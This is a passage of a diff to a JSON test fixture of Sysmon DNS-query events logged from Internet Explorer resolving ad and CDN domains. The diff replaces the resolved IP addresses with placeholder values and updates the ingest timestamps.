Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es0.2mdn.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 s0-2mdn-net.l.google.com;::ffff:172.217.10.134;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029909900Z'/\u003e\u003cEventRecordID\u003e133\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es0.2mdn.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 s0-2mdn-net.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", 
@@ -10014,17 +9914,17 @@ "type": "CNAME" }, { - "data": "23.50.53.195", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.185", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.195", - "23.50.53.185" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -10041,14 +9941,13 @@ "b.scorecardresearch.com" ], "ip": [ - "23.50.53.195", - "23.50.53.185" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741756100Z", + "ingested": "2021-12-09T13:50:23.457124400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029920400Z'/\u003e\u003cEventRecordID\u003e134\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b.scorecardresearch.com.edgesuite.net;type: 5 a1294.w20.akamai.net;::ffff:23.50.53.195;::ffff:23.50.53.185;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029920400Z'/\u003e\u003cEventRecordID\u003e134\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b.scorecardresearch.com.edgesuite.net;type: 5 a1294.w20.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", 
@@ -10112,27 +10011,27 @@ "type": "CNAME" }, { - "data": "151.101.130.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.194.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.2.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.66.2", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.130.2", - "151.101.194.2", - "151.101.2.2", - "151.101.66.2" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -10148,16 +10047,13 @@ "edw.edmunds.com" ], "ip": [ - "151.101.130.2", - "151.101.194.2", - "151.101.2.2", - "151.101.66.2" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741760Z", + "ingested": "2021-12-09T13:50:23.457130400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.548958100Z'/\u003e\u003cEventRecordID\u003e135\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.921\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eedw.edmunds.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.shared.global.fastly.net;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;::ffff:151.101.66.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.548958100Z'/\u003e\u003cEventRecordID\u003e135\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.921\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eedw.edmunds.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.shared.global.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.548Z", @@ -10221,12 +10117,12 @@ "type": "CNAME" }, { - "data": "72.21.91.29", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "network": { 
@@ -10242,13 +10138,13 @@ "ocsp.digicert.com" ], "ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741766100Z", + "ingested": "2021-12-09T13:50:23.457167Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692712500Z'/\u003e\u003cEventRecordID\u003e136\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.101\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.digicert.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692712500Z'/\u003e\u003cEventRecordID\u003e136\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.101\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.digicert.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -10312,23 +10208,23 @@ "type": "CNAME" }, { - "data": "35.167.55.0", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.24.219.168", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.43.21.209", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.200.225.167", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -10336,7 +10232,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { 
@@ -10344,7 +10240,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -10353,15 +10249,15 @@ } ], "resolved_ip": [ - "35.167.55.0", - "52.24.219.168", - "52.43.21.209", - "54.200.225.167", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30" ] }, 
@@ -10378,22 +10274,19 @@ "pre-usermatch.targeting.unrulymedia.com" ], "ip": [ - "35.167.55.0", - "52.24.219.168", - "52.43.21.209", - "54.200.225.167", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741773100Z", + "ingested": "2021-12-09T13:50:23.457174200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692750200Z'/\u003e\u003cEventRecordID\u003e137\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.137\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epre-usermatch.targeting.unrulymedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
usermatch.targeting.unrulymedia.com;::ffff:35.167.55.0;::ffff:52.24.219.168;::ffff:52.43.21.209;::ffff:54.200.225.167;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692750200Z'/\u003e\u003cEventRecordID\u003e137\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.137\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epre-usermatch.targeting.unrulymedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 usermatch.targeting.unrulymedia.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -10457,27 +10350,27 @@ "type": "CNAME" }, { - "data": "144.76.67.119", + "data": "89.160.20.156", "type": "A" }, { - "data": "148.251.77.207", + "data": "89.160.20.156", "type": "A" }, { - "data": "148.251.15.115", + "data": "89.160.20.156", "type": "A" }, { - "data": "176.9.103.51", + "data": "89.160.20.156", "type": "A" }, { - "data": "88.198.208.110", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -10485,7 +10378,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -10493,7 +10386,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -10501,23 +10394,23 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" } ], "resolved_ip": [ - "144.76.67.119", - "148.251.77.207", - "148.251.15.115", - "176.9.103.51", - "88.198.208.110", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "network": { 
@@ -10533,24 +10426,20 @@ "farm.plista.com" ], "ip": [ - "144.76.67.119", - "148.251.77.207", - "148.251.15.115", - "176.9.103.51", - "88.198.208.110", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741778900Z", + "ingested": "2021-12-09T13:50:23.457180200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692762900Z'/\u003e\u003cEventRecordID\u003e138\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.141\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003efarm.plista.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
farm-hetzner.plista.com;::ffff:144.76.67.119;::ffff:148.251.77.207;::ffff:148.251.15.115;::ffff:176.9.103.51;::ffff:88.198.208.110;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692762900Z'/\u003e\u003cEventRecordID\u003e138\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.141\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003efarm.plista.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 farm-hetzner.plista.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program 
Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -10618,52 +10507,52 @@ "type": "CNAME" }, { - "data": "50.17.180.35", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.103.40", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.210.19", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.117.149", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.222.244", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.222.88", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.81.100", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.204.10.30", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" } ], "resolved_ip": [ - "50.17.180.35", - "50.19.103.40", - "50.19.210.19", - "50.19.117.149", - "50.19.222.244", - "50.19.222.88", - "50.19.81.100", - "54.204.10.30", - "192.5.6.30" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30" ] }, "network": { 
@@ -10680,21 +10569,14 @@ "beacon.krxd.net" ], "ip": [ - "50.17.180.35", - "50.19.103.40", - "50.19.210.19", - "50.19.117.149", - "50.19.222.244", - "50.19.222.88", - "50.19.81.100", - "54.204.10.30", - "192.5.6.30" + "89.160.20.156", + "192.168.6.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741786200Z", + "ingested": "2021-12-09T13:50:23.457186400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692780500Z'/\u003e\u003cEventRecordID\u003e139\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData 